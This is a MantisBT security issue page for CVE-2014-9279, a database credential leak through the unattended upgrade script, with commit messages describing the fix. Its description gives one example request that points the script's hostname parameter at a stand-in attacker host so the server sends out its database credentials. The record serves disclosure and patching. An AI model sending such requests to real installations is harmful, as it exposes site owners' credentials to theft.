View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0017877 | mantisbt | security | public | 2014-11-14 19:34 | 2014-12-05 18:33 |
Reporter | avlidienbrunn | Assigned To | dregad | ||
Priority | high | Severity | major | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Product Version | 1.1.0a3 | ||||
Target Version | 1.2.18 | Fixed in Version | 1.2.18 | ||
Summary | 0017877: CVE-2014-9279: Db Credentials leak via unattended upgrade script | ||||
Description | When [MantisBT]/admin/upgrade_unattended.php?hostname=attacker.com is accessed, MantisBT will connect to attacker.com with the current DB config credentials. | ||||
Additional Information | Originally reported under point 6. in 0017362 | ||||
Tags | No tags attached. | ||||
MantisBT: master 7c7c2ac7 2014-10-30 14:53 Paul Richards Committer: dregad Details Diff |
DB Credentials leak in upgrade_unattended.php Retrieve credentials from Mantis system configuration instead of accepting them from POST parameters. This issue was reported by Matthias Karlsson (http://mathiaskarlsson.me) as part of Offensive Security's bug bounty program [1]. Fixes 0017877 [1] http://www.offensive-security.com/bug-bounty-program/ Signed-off-by: Damien Regad <dregad@mantisbt.org> |
Affected Issues 0017877 |
|
mod - admin/upgrade_unattended.php | Diff File | ||
MantisBT: master-1.2.x 0826cef8 2014-11-28 06:50 Details Diff |
DB Credentials leak in upgrade_unattended.php Retrieve credentials from Mantis system configuration instead of accepting them from POST parameters. This issue was reported by Matthias Karlsson (http://mathiaskarlsson.me) as part of Offensive Security's bug bounty program [1]. Paul Richards' original patch was modified to align the code with master branch to (basically replacing DIRECTORY_SEPARATOR by '/') to facilitate porting. Fixes 0017877 [1] http://www.offensive-security.com/bug-bounty-program/ Signed-off-by: Damien Regad <dregad@mantisbt.org> |
Affected Issues 0017877 |
|
mod - admin/upgrade_unattended.php | Diff File |